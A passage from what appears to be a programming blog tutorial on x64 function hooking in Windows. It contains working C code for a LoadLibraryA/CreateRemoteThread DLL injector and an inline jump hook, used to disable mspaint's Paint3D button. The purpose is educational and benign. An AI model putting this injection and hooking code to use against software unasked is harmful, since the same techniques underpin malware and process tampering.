<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunction</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//now that the relay function is built, we need to install the E9 jump into the target func,</span>
<span class="c1">//this will jump to the relay function</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="c1">//32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="c1">//to fill out the last 4 bytes of jmpInstruction, we need the offset between </span>
<span class="c1">//the relay function and the instruction immediately AFTER the jmp instruction</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="c1">//install the hook</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">AddColors</span><span class="p">,</span> <span class="n">ReturnRed</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">col</span> <span class="o">=</span> <span class="n">AddColors</span><span class="p">(</span><span class="mh">0xFF000000</span><span class="p">,</span> <span class="mh">0x000000FF</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">col</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<p>This is all we need to know to start installing hooks in programs we have source access to, but there’s an annoying gap between that and being able to hook a running instance of a program. We’ll bridge that gap with the next example.</p>
<h2 id="example-2-hooking-functions-in-a-running-program">Example 2: Hooking Functions in a Running Program</h2>
<p>The second example program we’re going to build will disable the “Edit With Paint3D” button in a running instance of mspaint.exe.</p>
<p>There are 2 new hurdles we have to overcome in order to install a hook in a running program: getting the target program to execute our hooking logic, and figuring out the address of the function we want to hook. We’ll tackle these in order.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/nopaint3d.gif" />
Our mission is to keep the Paint3D button from accomplishing its mission.
<br /><br />
</div>
<h3 id="getting-code-into-a-running-process">Getting Code Into a Running Process</h3>
<p>The simplest way to get an arbitrary process to execute hooking logic is to build that logic into a DLL and use DLL injection to get that code into the target process’ memory.</p>
<p>The nuts and bolts of how DLL injection work are beyond the scope of this blog post, but if you want to learn more, check out <a href="http://deniable.org/windows/inject-all-the-things">this article</a>. I’ve included the code for a basic DLL injection program in the collapsable box below. This is the code that the example program will use to inject its dll into mspaint.exe.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full DLL Injection Code (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process</span>
<span class="c1">// usage: Injector_LoadLibrary <process name> <path to dll> </span>
<span class="cp">#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
</span>
<span class="kt">void</span> <span class="nf">printHelp</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Injector_LoadLibrary</span><span class="se">\n</span><span class="s">Usage: Injector_LoadLibrary <process name> <path to dll></span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">createRemoteThread</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">processID</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">dllPath</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">handle</span> <span class="o">=</span> <span class="n">OpenProcess</span><span class="p">(</span>
<span class="n">PROCESS_QUERY_INFORMATION</span> <span class="o">|</span> <span class="c1">//Needed to get a process' token</span>
<span class="n">PROCESS_CREATE_THREAD</span> <span class="o">|</span> <span class="c1">//for obvious reasons</span>
<span class="n">PROCESS_VM_OPERATION</span> <span class="o">|</span> <span class="c1">//required to perform operations on address space of process (like WriteProcessMemory)</span>
<span class="n">PROCESS_VM_WRITE</span><span class="p">,</span> <span class="c1">//required for WriteProcessMemory</span>
<span class="n">FALSE</span><span class="p">,</span> <span class="c1">//don't inherit handle</span>
<span class="n">processID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">handle</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not open process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//once the process is open, we need to write the name of our dll to that process' memory</span>
<span class="kt">size_t</span> <span class="n">dllPathLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">dllPath</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">dllPathRemote</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//let the system decide where to allocate the memory</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="c1">//actually commit the virtual memory</span>
<span class="n">PAGE_READWRITE</span><span class="p">);</span> <span class="c1">//mem access for committed page</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dllPathRemote</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not allocate %zd bytes in process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">writeSucceeded</span> <span class="o">=</span> <span class="n">WriteProcessMemory</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="n">dllPathRemote</span><span class="p">,</span>
<span class="n">dllPath</span><span class="p">,</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">writeSucceeded</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not write %zd bytes to process with pid %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now get address of LoadLibraryW function inside Kernel32.dll</span>
<span class="c1">//TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"</span>
<span class="n">PTHREAD_START_ROUTINE</span> <span class="n">loadLibraryFunc</span> <span class="o">=</span> <span class="p">(</span><span class="n">PTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="n">TEXT</span><span class="p">(</span><span class="s">"Kernel32.dll"</span><span class="p">)),</span> <span class="s">"LoadLibraryA"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">loadLibraryFunc</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not find LoadLibraryA function inside kernel32.dll</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now create a thread in remote process that loads our target dll using LoadLibraryA</span>
<span class="n">HANDLE</span> <span class="n">remoteThread</span> <span class="o">=</span> <span class="n">CreateRemoteThread</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//default thread security</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//stack size for thread</span>
<span class="n">loadLibraryFunc</span><span class="p">,</span> <span class="c1">//pointer to start of thread function (for us, LoadLibraryA)</span>
<span class="n">dllPathRemote</span><span class="p">,</span> <span class="c1">//pointer to variable being passed to thread function</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//0 means the thread runs immediately after creation</span>
<span class="nb">NULL</span><span class="p">);</span> <span class="c1">//we don't care about getting back the thread identifier</span>
<span class="k">if</span> <span class="p">(</span><span class="n">remoteThread</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not create remote thread.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="s">"Success! remote thread started in process %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Wait for the remote thread to terminate</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
<span class="c1">//once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down</span>
<span class="n">VirtualFreeEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">dllPathRemote</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">handle</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="nf">findPidByName</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">h</span><span class="p">;</span>
<span class="n">PROCESSENTRY32</span> <span class="n">singleProcess</span><span class="p">;</span>
<span class="n">h</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span> <span class="c1">//takes a snapshot of specified processes</span>
<span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="c1">//get all processes</span>
<span class="mi">0</span><span class="p">);</span> <span class="c1">//ignored for SNAPPROCESS</span>
<span class="n">singleProcess</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span>
<span class="k">do</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">singleProcess</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">singleProcess</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"PID Found: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="n">pid</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">));</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printHelp</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">createRemoteThread</span><span class="p">(</span><span class="n">findPidByName</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<p>The code for the dll we’re going to inject is basically identical to the last example except that main() will be replaced by DllMain(), and we need to do some extra work to get a pointer to the function we want to hook. With those concerns in mind, the skeleton of Example 2’s dll looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//source for a hooking dll that will be injected into mspaint.exe</span>
<span class="cp">#include <Windows.h>
#include <stdint.h>
#include <Psapi.h>
</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//same as before</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//same as before</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//same as before</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">);</span> <span class="c1">//we'll fill this in later</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<h3 id="what-function-do-we-need-to-hook">What Function Do We Need to Hook?</h3>
<p>Since our goal is to disable the “Edit With Paint3D” button, we need to find the mspaint.exe function that handles that button press. We know that the “Edit With Paint3D” button eventually launches a Paint3D process, so we can be reasonably sure that a function like CreateProcessA() or OpenProcess() gets called at some point during the button handling function. Blindly hooking either of these functions and redirecting them to an empty function doesn’t work (I tried), but throwing some breakpoints on them is as good a place to start as any.</p>
<p>If we look at the functions imported by mspaint in a debugger (like <a href="https://x64dbg.com">x64dbg</a>), we can see that it is in fact importing OpenProcess(), so our first step is to throw a breakpoint there and then see what happens when we press the paint3d button.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/reverse_step1.PNG" />
<br /><br />
</div>
<p>It turns out that our breakpoint <em>does</em> get hit in response to the button click, which is fantastic. If we switch over to the callstack view while we’re stopped at the breakpoint, we can see a couple of mspaint.exe functions much higher up in the stack. It’s possible that the one of these that’s highest in the callstack is the button handler function we’re after.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/reverse_step2.png" />
<br /><br />
</div>
<p>Going to the address shown for that function brings us into middle of a function body. What we’re after is the relative virtual address (RVA) of the beginning of this function. x64dbg makes this really easy. All we need to do is scroll up until we find the first instruction for the function, then right click on the address of that instruction and select “Copy->RVA.” In my version of mspaint.exe, the RVA of this function is 0x4AA40.</p>
<p>I’m going to save us some trial and error here and reveal that 0x4AA40 ends up <em>not</em> being the address we need. The real button handler runs on a different thread. Hooking 0x4AA40 and redirecting it to an empty function disables the Paint3D button, but only if the current document is empty.</p>
<p>I wish I had a better procedure to share, but my next step after realizing the above was to retry the same procedure except draw something in paint before I clicked the Paint3D button. The callstack I got then had a number of calls inside uiribbon.dll, and the highest mspaint.exe function in that stack ended up being the button handler. Its RVA was 0x6C6F0.</p>
<h3 id="turning-an-rva-into-a-runtime-memory-address">Turning an RVA Into a Runtime Memory Address</h3>
<p>RVAs are addresses which are relative to the base address of the module they’re located in. Since programs (and individual modules, thanks to ASLR) can be loaded into memory at different locations across multiple runs of the same program, having the RVA of a function means that we can reliably get that function’s address, no matter where the process is loaded in memory.</p>
<p>In this case, our target function is implemented inside the base module of the process (since it isn’t imported from a dll), so we need to find the base address of the mspaint.exe module. We can do this with the function below.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">uint64_t</span> <span class="nf">GetBaseModuleForProcess</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">process</span> <span class="o">=</span> <span class="n">GetCurrentProcess</span><span class="p">();</span>
<span class="n">HMODULE</span> <span class="n">processModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">processModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">processName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">processName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">processName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">module</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">processModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">processName</span><span class="p">,</span> <span class="n">absoluteModuleName</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">module</span> <span class="o">=</span> <span class="n">processModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">module</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>HMODULES are actually pointers to the location of a module in memory, so the cast to a uint64_t in the above example is mostly for convenience. In order to get the address of our target function, we’ll need to add the function’s RVA to this base module address.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span><span class="o">*</span> <span class="nf">GetFunc2HookAddr</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">functionRVA</span> <span class="o">=</span> <span class="mh">0x6C6F0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">func2HookAddr</span> <span class="o">=</span> <span class="n">GetBaseModuleForProcess</span><span class="p">()</span> <span class="o">+</span> <span class="n">functionRVA</span><span class="p">;</span>
<span class="k">return</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">func2HookAddr</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If we were hooking a function that was imported from a dll, we’d need to modify the GetBaseMdouleForProcess() function to let us specify the name of the module that we were after, rather than being hardcoded to find the base. We’ll do this in the fourth example in this post, but you can also see an example of this in the code for my hooking-by-example repo <a href="https://github.com/khalladay/hooking-by-example/blob/64d6eb01bcb253d0f622e5fbae434d344ccf8330/hooking-by-example/hooking_common.h#L182">here</a>.</p>
<h3 id="putting-it-all-together">Putting It All Together</h3>
<p>Now that we have a function to hook, we need to do is to redirect it to an empty payload function to disable it. This is straightforward as it sounds:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">NullPaint3DButtonHandler</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">GetFunc2HookAddr</span><span class="p">(),</span> <span class="n">NullPaint3DButtonHandler</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We got a bit lucky here because the button handling function doesn’t have a significant return value (or at least, returning 0 from it is valid). The smart way to approach this would probably be to spend some time in the debugger really understanding what this button handling function does, so that we could write a payload that we knew wasn’t going to break anything, but sometimes it’s better to be lucky than smart.</p>
<p>All we need to do to finish things off is add the implementation for GetFunc2HookAddr() and the payload function into our example dll. The end result is a dll that disables the “Edit with Paint3D” button when injected into mspaint, exactly as we planned. The full source for this example is in the collapsable bow below.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Code for Example 2 (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include <Windows.h>
#include <stdint.h>
#include <Psapi.h>
</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
